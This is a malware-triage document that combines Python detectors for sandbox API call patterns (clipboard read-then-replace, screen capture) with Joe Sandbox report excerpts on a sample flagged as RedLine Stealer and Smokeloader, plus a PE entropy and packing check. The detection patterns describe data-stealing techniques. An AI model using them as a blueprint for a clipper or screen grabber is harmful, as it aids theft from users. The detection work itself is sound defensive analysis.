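import re

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF",
    r"Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_024C1942",
    r"Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00431839",
    r"Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024C2605",
]

# Ordered (not necessarily adjacent) API subsequences. Order matters: a
# function that reads the clipboard, empties it and then writes new data in
# the same function is the read-then-replace shape; the reverse order is not.
PATTERNS = {
    "clipboard_read_then_replace": [
        "OpenClipboard", "GetClipboardData", "EmptyClipboard",
        "SetClipboardData", "CloseClipboard",
    ],
    "gdi_screen_capture": [
        "GetDC", "CreateCompatibleDC", "CreateCompatibleBitmap",
        "SelectObject", "BitBlt",
    ],
}

FUNC_RE = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-Fa-f]+)\s*(.*)$")
FUNC_ID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")


def parse_code_function(line):
    """Return (function_id, [api, ...]) or None. The sandbox repeats the
    function id at the end of the call list; it is dropped here."""
    m = FUNC_RE.search(line)
    if not m:
        return None
    calls = [c.strip() for c in m.group(2).split(",") if c.strip()]
    return m.group(1), [c for c in calls if not FUNC_ID_RE.match(c)]


def is_subsequence(pattern, calls):
    """True if every element of pattern occurs in calls in the given order."""
    it = iter(calls)
    return all(any(c == wanted for c in it) for wanted in pattern)


def classify(lines):
    """function_id -> names of the patterns its call list satisfies."""
    result = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed:
            func_id, calls = parsed
            result[func_id] = [name for name, pat in PATTERNS.items()
                               if is_subsequence(pat, calls)]
    return result


def process_of(line):
    """Image path the function belongs to: the text between 'Source: ' and
    'Code function:', with or without a separator in between."""
    m = re.match(r"Source:\s*(.+?)\s*\|?\s*Code function:", line)
    return m.group(1) if m else None


def address(func_id):
    """(process_index, virtual_address) from a function id such as
    '0_2_024C1942'; the first two fields mirror the .sdmp dump names."""
    proc, _, addr = func_id.split("_")
    return int(proc), int(addr, 16)
```

Grouping by address() is what makes the duplicate visible: 0x4016DF lies inside the loader's mapped image while 0x24C1942 lies in the separately allocated 0x24C0000 region, so the same clipboard routine exists both in the file on disk and in memory the process unpacked at runtime.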

                System Summary

                Source: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_024C2361
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C2605 NtdllDefWindowProc_W,PostQuitMessage,0_2_024C2605
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: String function: 024A81D7 appears 78 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: String function: 024B42C7 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: String function: 00414060 appears 74 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: String function: 00407F70 appears 46 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: String function: 024D0987 appears 53 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: String function: 00410720 appears 53 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: String function: 0040F903 appears 36 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: String function: 024D0019 appears 121 times
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: String function: 0040FDB2 appears 125 times
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708
                Source: AZCFTWko2q.exe | Binary or memory string: OriginalFileName vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe, 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe, 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe, 00000000.00000003.1461824570.0000000002530000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs AZCFTWko2q.exe
                Source: AZCFTWko2q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: AZCFTWko2q.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 86DC.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@11/5
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A39FDE CreateToolhelp32Snapshot,Module32First
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htm
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5868
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | File created: C:\Users\user\AppData\Local\Temp\86DC.tmp
                Source: AZCFTWko2q.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: AZCFTWko2q.exe | Virustotal: Detection: 56%
                Source: AZCFTWko2q.exe | ReversingLabs: Detection: 55%
                Source: unknown | Process created: C:\Users\user\Desktop\AZCFTWko2q.exe "C:\Users\user\Desktop\AZCFTWko2q.exe"
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Process created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe"
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: msimg32.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: msvcr100.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: pcacli.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Section loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Section loaded: msimg32.dll
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Section loaded: msvcr100.dll
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Unpacked PE file: 3.2.86DC.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Unpacked PE file: 0.2.AZCFTWko2q.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Unpacked PE file: 3.2.86DC.tmp.exe.400000.0.unpack
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0041EC5E
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00410766 push ecx; ret 0_2_00410779
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A3F1E2 pushad ; ret 0_2_00A3F1FE
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A3F360 push ecx; ret 0_2_00A3F37D
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A3C734 pushad ; ret 0_2_00A3C75C
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A3CBD5 push 00000003h; ret 0_2_00A3CBD9
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_00A3AE2A push es; iretd 0_2_00A3AE3B
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024D09CD push ecx; ret 0_2_024D09E0
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024F799F push esp; retf 0_2_024F79A7
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024DCE18 push ss; retf 0_2_024DCE1D
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024CFFF3 push ecx; ret 0_2_024D0006
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024F7F9D push esp; retf 0_2_024F7F9E
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024FDDDE push dword ptr [esp+ecx-75h]; iretd 0_2_024FDDE2
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Code function: 0_2_024F9DE8 pushad ; retf 0_2_024F9DEF
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h 3_2_0043BF01
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_008DBCF5 pushad ; ret 3_2_008DBCFA
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_008DBF7B push ebp; ret 3_2_008DBF80
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_024DC167 push eax; mov dword ptr [esp], 49484716h 3_2_024DC168
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_024DF555 push esp; iretd 3_2_024DF556
Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe | Code function: 3_2_024BAF5D push esp; iretd 3_2_024BAF66
Source: AZCFTWko2q.exe | Static PE information: section name: .text entropy: 7.54486526059017
Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.371146835595198
Source: 86DC.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.371146835595198
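The ".text entropy" rows above (7.54 for the dropper, 7.37 for the dropped 86DC.tmp.exe / ScreenUpdateSync[1].exe) and the "Unpacked PE file ... vs ..." row are two static packing checks: a code section whose Shannon entropy is close to 8 bits per byte, and a section table that differs between the file on disk and the image recovered from memory. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it parses a PE section table with the standard library only and implements both checks over two PE images constructed for the demo. The 7.0 cut-off and the E/R/W rendering of the section characteristics are my own assumptions, not the sandbox's.

```python
"""Added example, not from the Joe Sandbox report or the analysed sample:
parse a PE section table with the standard library only, compute per-section
Shannon entropy (the check behind the '.text entropy' rows) and compare the
section layout of two images (the check behind the 'Unpacked PE file ... vs'
row). Both images built below are constructed for this demo."""
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
PACKED_THRESHOLD = 7.0  # assumption: a common triage cut-off for packed/encrypted code


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform byte spread."""
    entropy, n = 0.0, len(data)
    for count in Counter(data).values():
        p = count / n
        entropy -= p * math.log2(p)
    return entropy


def pe_sections(image: bytes):
    """Yield (name, characteristics, raw_bytes) for each section header."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                              # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                     # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        flags = struct.unpack_from("<I", image, off + 36)[0]
        yield name, flags, image[raw_ptr:raw_ptr + raw_size]


def section_entropies(image: bytes) -> dict:
    return {name: round(shannon_entropy(raw), 3) for name, _, raw in pe_sections(image)}


def packed_sections(image: bytes, threshold: float = PACKED_THRESHOLD) -> list:
    """Names of sections whose entropy reaches the threshold (candidate packed code)."""
    return [name for name, e in section_entropies(image).items() if e >= threshold]


def section_rights(image: bytes) -> str:
    """Own rendering of the section permission summary as name:E/R/W letters."""
    bits = (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE))
    parts = [name + ":" + "".join(c for c, bit in bits if flags & bit)
             for name, flags, _ in pe_sections(image)]
    return ";".join(parts) + ";"


def layout_changed(disk_image: bytes, memory_dump: bytes) -> bool:
    """True when the in-memory section table no longer matches the file on disk."""
    return section_rights(disk_image) != section_rights(memory_dump)


def build_pe(sections) -> bytes:
    """Constructed minimal PE: DOS stub, PE signature, COFF header with no
    optional header, one 40-byte header per section, then the raw bodies."""
    e_lfanew = 64
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    ptr = e_lfanew + 4 + len(coff) + 40 * len(sections)
    table, raw = b"", b""
    for name, body, flags in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(body), 0, len(body), ptr, 0, 0, 0, 0, flags)
        raw += body
        ptr += len(body)
    return bytes(dos) + b"PE\0\0" + coff + table + raw


ER = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
R = IMAGE_SCN_MEM_READ
RW = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
# Constructed on-disk image: .text holds every byte value equally often (8.0 bits, looks packed).
DISK_IMAGE = build_pe([(b".text", bytes(range(256)) * 4, ER), (b".rdata", b"AB" * 256, R),
                       (b".data", bytes(512), RW), (b".rsrc", bytes(64), R)])
# Constructed memory dump after unpacking: low-entropy code and a different section list.
MEMORY_DUMP = build_pe([(b".text", b"\x90\xc3" * 512, ER), (b".rdata", b"AB" * 256, R),
                        (b".data", bytes(512), RW), (b".CRT", bytes(64), R), (b".reloc", bytes(64), R)])

if __name__ == "__main__":
    print(section_entropies(DISK_IMAGE), "packed:", packed_sections(DISK_IMAGE))
    print(section_rights(DISK_IMAGE), "vs", section_rights(MEMORY_DUMP),
          "changed:", layout_changed(DISK_IMAGE, MEMORY_DUMP))
```

High entropy alone is not proof of packing: compressed resources, embedded certificates and .NET metadata also score close to 8 bits, so treat the threshold as a triage hint and confirm with the layout comparison against a memory dump, as the report does.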
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | File created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\AZCFTWko2q.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
